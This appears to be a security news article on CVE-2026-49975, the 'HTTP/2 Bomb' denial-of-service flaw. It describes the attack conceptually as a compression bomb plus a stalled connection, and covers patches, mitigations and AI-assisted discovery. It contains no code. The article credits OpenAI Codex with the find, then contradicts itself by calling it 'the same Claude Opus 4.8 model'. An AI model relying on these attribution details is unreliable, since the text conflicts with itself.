HTTP/2 Bomb Exploit Crashes NGINX, Apache, and IIS in Seconds — Proof-of-Concept Already on GitHub

A newly disclosed vulnerability in HTTP/2 server implementations — nicknamed the "HTTP/2 Bomb" and tracked as CVE-2026-49975 — allows an attacker to crash NGINX, Apache HTTP Server, Microsoft IIS, Envoy, and Cloudflare Pingora in seconds, using a single system with a standard 100Mbps internet connection. Security firm Calif, which discovered the flaw using OpenAI Codex, published details on June 2, 2026. Public proof-of-concept Python scripts appeared on GitHub the same day.

The vulnerability is significant because HTTP/2 is the default protocol for modern web servers — not an optional feature that administrators typically disable. Any server accepting HTTPS connections over HTTP/2 with default configuration is potentially exposed.

How the Attack Works

The HTTP/2 Bomb chains two techniques that individually exist in the research literature but haven't previously been combined into a weaponized exploit. The first is a variation of an HPACK compression bomb — a method of sending headers that decompress to massive sizes, consuming disproportionate memory on the receiving server. The second is a Slowloris-style hold: deliberately stalling the connection so the server's decompressed memory cannot be freed.

Together, these two techniques exploit a specific behavior in how HTTP/2 server implementations allocate and release memory during header processing. By sending crafted compressed headers and then holding the connection open without completing the request, an attacker causes rapid, progressive memory exhaustion on the server. Unlike volumetric DDoS attacks that require massive bandwidth, this exploit works with minimal throughput — researchers at Calif demonstrated crashes using just 100Mbps from a single machine.

What's Patched, What Isn't

As of June 6, two major server projects have released fixes. NGINX addressed the vulnerability in release 1.29.8. Apache HTTP Server patched it in mod_http2 version 2.0.41, where the CVE is formally assigned as CVE-2026-49975. HAProxy is reported to be inherently resilient to this exploit, or can be configured to block it.

Microsoft IIS, Envoy, and Cloudflare Pingora had not released confirmed patches as of June 2, when initial disclosure occurred. Envoy tracks a related issue as CVE-2026-47774. Administrators running these servers should monitor vendor advisories closely.

Mitigation Options

For organizations that cannot immediately update NGINX or Apache, Calif recommends three interim options. First, isolate exposed servers behind a reverse proxy, web application firewall (WAF), or Layer 7 load balancer with HTTP/2 protection enabled — HAProxy, properly configured, can absorb the attack. Second, disable HTTP/2 at the server level; this is disruptive to performance but eliminates the attack surface. Third, apply rate limiting on header processing at the ingress layer.

The OpenAI Codex Angle

Calif's disclosure notes that CVE-2026-49975 was discovered using OpenAI Codex as an analysis tool during a directed review of HTTP/2 server implementations. The finding adds to a growing pattern of AI-assisted vulnerability research: the same Claude Opus 4.8 model found the Zcash Halo2 double-spend bug disclosed last week. This isn't a passive observation — it's an arms race dynamic. The same tools available to defensive researchers are available to offensive actors. Organizations running HTTP/2 servers should treat the public availability of PoC code as a meaningful escalation of exposure risk and prioritize patching accordingly.